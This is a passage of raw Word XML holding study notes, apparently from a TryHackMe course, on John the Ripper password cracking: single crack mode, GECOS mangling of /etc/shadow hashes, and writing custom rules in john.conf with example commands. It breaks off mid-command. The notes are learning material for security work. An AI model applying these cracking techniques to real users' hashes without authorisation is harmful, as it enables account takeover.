    </w:p>
    <w:p w14:paraId="08B67B27" w14:textId="03A8F9CC" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>GECOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483B45F" w14:textId="5F490D2C" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>John Word Mangling is compatible with GECOS fields of UNIX OS and similar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B4247" w14:textId="13D10A33" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gecos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> fields are fields split by a colon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55810CCF" w14:textId="658CD8C4" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>information can be taken from these records and add into the wordlist it generates when cracking /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/shadow hashes in single crack mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB5925" w14:textId="1B31428F" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="006E0043" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using Single Crack Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD336A0" w14:textId="4D28F403" w:rsidR="006E0043" w:rsidRPr="0084205E" w:rsidRDefault="0096184C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>john --single --format=[format] [path to file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372601CA" w14:textId="2534E9FD" w:rsidR="0096184C" w:rsidRPr="0084205E" w:rsidRDefault="0096184C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. john --single --format=raw-sha256 hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0142C2" w14:textId="3A63308A" w:rsidR="0096184C" w:rsidRPr="0084205E" w:rsidRDefault="0096184C" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>when cracking hashes in single crack mode, must change file format by prepending hash with username</w:t>
      </w:r>
      <w:r w:rsidR="0040178D" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> that the hash belongs to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A0038" w14:textId="091D01F6" w:rsidR="0040178D" w:rsidRPr="0084205E" w:rsidRDefault="0040178D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. 1efee03cdcb96d90ad48ccc7b8666033 </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> mike:1efee03cdcb96d90ad48ccc7b8666033</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0EC58" w14:textId="2B3DF579" w:rsidR="0040178D" w:rsidRPr="0084205E" w:rsidRDefault="0040178D" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Custom Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FEF78E" w14:textId="780B7B70" w:rsidR="0040178D" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>define sets of rules for dynamic creation of password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B7258" w14:textId="035A220D" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>helpful when knowledge of target is possessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D90871" w14:textId="05BEE58F" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common Custom Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6813790D" w14:textId="3E8CC5DD" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>requirements stated such as capitals, numbers, symbols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F92F1" w14:textId="752C8FDF" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>predictable placement of these requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4998445D" w14:textId="7BF0CF71" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>How to create custom rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053198F" w14:textId="0678BA1F" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>john.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088FE71" w14:textId="03548DAB" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/john/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>john.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DCB9B48" w14:textId="03B050FA" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidR="008607CB" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.openwall.com/john/doc/RULES.shtml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79DAE28F" w14:textId="5B8D0AD3" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>first line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE51DA3" w14:textId="2DF3EF96" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>List.Rules:THMRules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>] – defines name of rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B19C6" w14:textId="71A8B46C" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>then use regex syntax style pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E8426" w14:textId="2F0D8ADC" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Az – takes word and append it with the characters you define</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3594F257" w14:textId="64A98899" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>A0 – takes the word and prepends it with the characters you define</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA3F74" w14:textId="55FED9AC" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="008607CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>c – capitalizes the character positionally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF185BC" w14:textId="75279339" w:rsidR="008607CB" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>can be used in combination to define where and what in the word you want to modify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A47E6C0" w14:textId="1C2EB713" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">define characters to be appended, prepended, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> by adding character sets in [] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> be used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47320F19" w14:textId="10A308E4" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">directly follow modifier patterns inside of double quote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>“ “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5998BE36" w14:textId="2095356B" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EB7F8" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[0-9] - Will include numbers 0-9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404745F" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F11ABB" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[0] - Will include only the number 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119B56F2" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6341AE" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[A-z] - Will include both upper and lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB79CA" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17DC2276" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[A-Z] - Will include only uppercase letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322C7E1" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185AF9BA" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>[a-z] - Will include only lowercase letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B1920" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116FE88C" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>[a] - Will include only a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D390985" w14:textId="77777777" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172F1E2B" w14:textId="03FF5869" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00FC2297" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>[!£</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>$%@] - Will include the symbols !£$%@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EF6F2F" w14:textId="20684242" w:rsidR="00FC2297" w:rsidRPr="0084205E" w:rsidRDefault="00C9416B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using Custom Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC2AA07" w14:textId="55421041" w:rsidR="00C9416B" w:rsidRPr="0084205E" w:rsidRDefault="00C9416B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>called with argument - -rule=&lt;rule name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6276637B" w14:textId="5E028E3D" w:rsidR="00C9416B" w:rsidRPr="0084205E" w:rsidRDefault="00C9416B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. john --wordlist</w:t>
      </w:r>
